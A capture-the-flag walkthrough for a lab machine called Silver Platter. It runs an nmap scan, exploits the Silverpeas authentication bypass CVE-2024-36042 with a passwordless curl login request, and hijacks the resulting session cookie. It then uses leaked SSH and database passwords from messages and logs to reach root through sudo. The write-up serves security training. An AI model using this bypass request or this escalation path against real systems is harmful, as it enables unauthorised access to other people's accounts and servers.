Silver Platter
Target Discovery
We begin by identifying open ports on the target machine.
export TARGET_IP=10.10.198.176
nmap -p- -Pn --min-rate 5000 $TARGET_IP
Nmap Scan Results:
Not shown: 65381 closed tcp ports (reset), 151 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
Initial Enumeration
Browsing http://10.10.198.176/#contact
, we find a note:
"If you'd like to get in touch with us, please reach out to our project manager on
Silverpeas
. His username isscr1ptkiddy
."
Navigating to http://10.10.198.176:8080/silverpeas/defaultLogin.jsp
, we find a login page for Silverpeas.
Exploiting Silverpeas Authentication Bypass (CVE-2024-36042)
A Google search reveals that Silverpeas (up to version 6.3.4) is vulnerable to a simple authentication bypass (CVE-2024-36042). The flaw allows authentication as any user by omitting the password field in the request.
Exploitation
We send an authentication request as scr1ptkiddy
without a password:
curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=scr1ptkiddy&DomainId=0"
Response:
HTTP/1.1 302 Found
Set-Cookie: JSESSIONID=XG8ol2dO2luwA5gzNHbDp4jtMig7y6vQn86wTy6S.ebabc79c6d2a; path=/silverpeas; HttpOnly
Gaining Access
Copy the JSESSIONID
value from the response and set it in your browser’s cookies (Storage Tab -> Cookies -> Modify JSESSIONID
).
Now, accessing http://10.10.198.176:8080/silverpeas/look/jsp/MainFrame.jsp
, we discover two more users: Administrateur
and Manager
.
Escalating Privileges
Using the same authentication bypass technique, we attempt login as Manager
:
curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=Manager&DomainId=0"
Inside the account, we find a message:
"Dude, how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes."
Username: tim
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
SSH Access as tim
We use the credentials to access the system via SSH:
ssh tim@10.10.198.176
# Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
Verifying user privileges:
id
# uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)
Privilege Escalation
Inspecting authentication logs:
less /var/log/auth.log.2
We find a log entry revealing a docker run
command executed as tyler
, containing a database password:
Dec 13 15:45:57 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/op
SSH Access as tyler
Using the extracted password:
ssh tyler@10.10.198.176
# Password: _Zd_zx7N823/
Checking user privileges:
id
# uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
Root Privilege Escalation
Checking sudo privileges:
sudo -l
# (ALL : ALL) ALL
Since tyler
has full sudo privileges, we escalate to root:
sudo su
id
# uid=0(root) gid=0(root) groups=0(root)